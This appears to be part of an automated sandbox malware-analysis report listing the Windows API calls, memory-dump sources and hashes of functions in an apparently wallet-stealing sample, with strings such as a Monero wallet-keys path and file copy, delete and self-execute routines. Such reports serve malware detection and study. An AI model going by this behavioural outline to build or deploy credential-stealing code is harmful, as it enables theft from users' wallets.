                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 4171519190-1096346117
                        • Opcode ID: ac31f320eb3bbd6ff7f98895637c9fd31cf88f9cc394115a4d2e8bba42125964
                        • Instruction ID: fe0136cb33f39c26fb8392c02144f9f27e3cbc91d7ec736dffcd9dad94b92917
                        • Opcode Fuzzy Hash: ac31f320eb3bbd6ff7f98895637c9fd31cf88f9cc394115a4d2e8bba42125964
                        • Instruction Fuzzy Hash: EF6151709002089BDF54EFA4CC96FEE77BAAF45304F008118F90A9F581EB746E46CB95
                        Function 006A40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0126E9F0,00000000,00020119,?), ref: 006A40F4
                        • RegQueryValueExA.ADVAPI32(?,0126F670,00000000,00000000,00000000,000000FF), ref: 006A4118
                        • RegCloseKey.ADVAPI32(?), ref: 006A4122
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4147
                        • lstrcat.KERNEL32(?,0126F688), ref: 006A415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 4817573bd02948983d7dd4c2145572abea7a223df67361e56c2fad9874fe8a0b
                        • Instruction ID: d75f2194d8d77964aaec1d40af1cf15453f90fe6cf63b1904440ce9a2f1e229e
                        • Opcode Fuzzy Hash: 4817573bd02948983d7dd4c2145572abea7a223df67361e56c2fad9874fe8a0b
                        • Instruction Fuzzy Hash: BB41D7B6D001086BDF18FBA0DC56FFE733EBB89300F50465DB61657181EA755B888BA2
                        Function 006A7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A7E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0125BFB0,00000000,00020119,?), ref: 006A7E5E
                        • RegQueryValueExA.ADVAPI32(?,0126E710,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
                        • RegCloseKey.ADVAPI32(?), ref: 006A7E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
                        • Instruction ID: 40f2f7a19c7dc83b332553058dcd6db32e47d608c3aae60f407752f8016afc94
                        • Opcode Fuzzy Hash: 14d285b0822712a1ee4b11107a82b5ed7aad83ea1d8e92f3551d75c5c886f1ca
                        • Instruction Fuzzy Hash: 8E115EB1A44205EBDB04DF94DD49FBBBBB9FB44B10F20425AFA06A7280D7745D018FA1
                        Function 006A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(0126F460,?,?,?,006A140C,?,0126F460,00000000), ref: 006A926C
                        • lstrcpyn.KERNEL32(008DAB88,0126F460,0126F460,?,006A140C,?,0126F460), ref: 006A9290
                        • lstrlen.KERNEL32(?,?,006A140C,?,0126F460), ref: 006A92A7
                        • wsprintfA.USER32 ref: 006A92C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
                        • Instruction ID: 5df33ea054577a39f4443dfc57613203b247693b0daec723d4eca2e23ba694c2
                        • Opcode Fuzzy Hash: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
                        • Instruction Fuzzy Hash: 2A01CC75501108FFCB08DFECD984EAE7BB9FB48364F208249F9099B344C631AA41DB91
                        Function 006912A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006912B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006912BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006912D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006912F5
                        • RegCloseKey.ADVAPI32(?), ref: 006912FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
                        • Instruction ID: 38206bee60847987519ae06821527ca9d1d05efb49c410b999a8d359844ede43
                        • Opcode Fuzzy Hash: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
                        • Instruction Fuzzy Hash: E501E1B9A40208BBDB04DFE4DC49FAEB7BCFB48701F10825AFE1597280D6759A419F51
                        Function 006AC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 9c99a84db5137a6869827c514629758eddb3c9fcde352deb6c1c07bdc72d6b21
                        • Instruction ID: fc199fc5cacdd86066d8c7e64fab9b57925553bac4998ac61e29592299b8f064
                        • Opcode Fuzzy Hash: 9c99a84db5137a6869827c514629758eddb3c9fcde352deb6c1c07bdc72d6b21
                        • Instruction Fuzzy Hash: 464107B110079C9EDB219B24CC84FFBBBEEAF46714F1444ECE98A86182D2719E45DF64
                        Function 006A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006A6663
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A6726
                        • ExitProcess.KERNEL32 ref: 006A6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
                        • Instruction ID: 51fccbc823dd87218049062ac7967150cf907bacb44aa54f66cc7973267a3f59
                        • Opcode Fuzzy Hash: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
                        • Instruction Fuzzy Hash: 50312DB1D01218AFDB94FB90DC92BDE7779AF44300F40419AF20966191DF746B48CF5A
                        Function 006A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E28,00000000,?), ref: 006A882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8836
                        • wsprintfA.USER32 ref: 006A8850
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
                        • Instruction ID: fab26cac4c670ed7a6adc53731e925ca5a2bc8c8cbe94f11eb8cf29124f85223
                        • Opcode Fuzzy Hash: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
                        • Instruction Fuzzy Hash: 012130B1A41204EFDB04DF94DD45FAEBBB8FB48701F20421AFA05A7280C7799D01CBA1
                        Function 006A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006A951E,00000000), ref: 006A8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8D62
                        • wsprintfW.USER32 ref: 006A8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
                        • Instruction ID: 942bbe810ec5ea8580280938b1a2c30719b40d5ea8b047d67297156c97a92aa6
                        • Opcode Fuzzy Hash: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
                        • Instruction Fuzzy Hash: 48E08CB0A41208BBDB04EF94DC0AE697BB8FB44702F2002A5FD0987280DA719E009B92
                        Function 0069A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0069A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0069A6BC
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0069A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 253d5248bb69c7d5eb2ea3e92dab04155d4cf5793fdd7f0cc598c0cbee84d7f4
                        • Instruction ID: d58c2acfe870aac3873b1041955a6209c8c3903263c9bfe1c03d85b85b553c3b
                        • Opcode Fuzzy Hash: 253d5248bb69c7d5eb2ea3e92dab04155d4cf5793fdd7f0cc598c0cbee84d7f4
                        • Instruction Fuzzy Hash: 4EE1C8728101089ADB88FBE4DC92EEE733AAF15300F50815EF51766091EF346E49CF6A
                        Function 0069D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D481
                        • lstrlen.KERNEL32(00000000), ref: 0069D698
                        • lstrlen.KERNEL32(00000000), ref: 0069D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0069D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
